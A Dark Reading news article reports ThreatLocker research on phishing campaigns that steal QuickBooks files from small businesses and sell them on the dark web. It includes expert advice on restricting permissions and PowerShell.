Stolen financial files then get sold on the Dark Web, researchers say.

Steve Zurier, Contributing Writer, Dark Reading

February 24, 2021

3 Min Read

Cybercriminals increasingly have targeted QuickBooks file data at small and midsize businesses (SMBs) over the past few months, according to new research.

The breaches start with two types of phishing attacks to gain access to QuickBooks databases, according to findings by ThreatLocker. In the first, the attackers send a PowerShell command that runs inside the malicious email. In the second, the attackers send a Word document via email; if the recipient opens the attached document, a macro or link within that document downloads a file onto their machine. Once the executable or PowerShell command runs, it retrieves the victim's most recently saved QuickBooks file location, points to the file share or local file, and grabs that file.

Danny Jenkins, co-founder and CEO of ThreatLocker, says the attackers usually upload the stolen files to either Google Cloud or Amazon Web Services as a temporary transfer point. From there, they sell the data on the Dark Web, where other cybercriminals buy the data to launch more targeted attacks on other QuickBooks databases or on the customers and suppliers of the victim organizations.

"They will attack every angle possible," Jenkins adds. "Cybercriminals can easily buy these QuickBook databases on the Dark Web and launch attacks."

Meantime, some 43% of organizations of all sizes say they've been victims of a spear-phishing attack in the past 12 months, according to data from Barracuda Networks, and only 23% say they have dedicated spear-phishing protection in place.

"Most of the emails are invoices and resumes," ThreatLocker's Jenkins explains of the lures. "We don't have exact numbers, but we do know that millions of dollars in cybercrime is caused by these types of attacks."

Accounting programs are often written without taking security into consideration, Jenkins notes, and QuickBooks has a fundamental flaw: When an administrator runs a "repair" on the QuickBooks database after a system crash, all the file-share permissions can be reset, leaving the database accessible by everyone in the company. This means if hackers get into the system after a repair, they have access to all permissions — including the company's accountant or business manager.    

"People wonder how the hackers have access to all their customer accounts, but it's really quite simple: Once they have access to the QuickBooks database, they have access to all your customers," Jenkins says. "What we're telling SMBs is to restrict permissions by user and by application. There's no reason for Microsoft Office or PowerShell to have access to QuickBooks."

ThreatLocker detailed its research in a blog post today.

Dirk Schrader, global vice president, security research at New Net Technologies, says the QuickBooks attacks are notable for their simplicity. The attackers are only using a few lines of PowerShell script and exploiting design weaknesses in a QuickBooks software application that’s often used by smaller companies, many of which lack the expertise and staffing to stay up-to-par with cybersecurity issues.

Schrader says SMBs should control whether PowerShell scripts can be executed with the current user's rights and permissions. While that might be overwhelming for some small organizations, they can instead look to secure configuration management and change control to detect the malicious file drops.

"Unfortunately, SMBs have to make a very first step, which is to acknowledge that a cyberattack will happen to them and that they are not too small to be of interest," Schrader says. "The interest the hackers have is to get the SMB's information about their customers [and then] work up to the larger corporate targets — be they customers or suppliers of the SMB."

About the Author(s)

Steve Zurier

Contributing Writer, Dark Reading

Steve Zurier has more than 30 years of journalism and publishing experience and has covered networking, security, and IT as a writer and editor since 1992. Steve is based in Columbia, Md.

Keep up with the latest cybersecurity threats, newly discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

You May Also Like


More Insights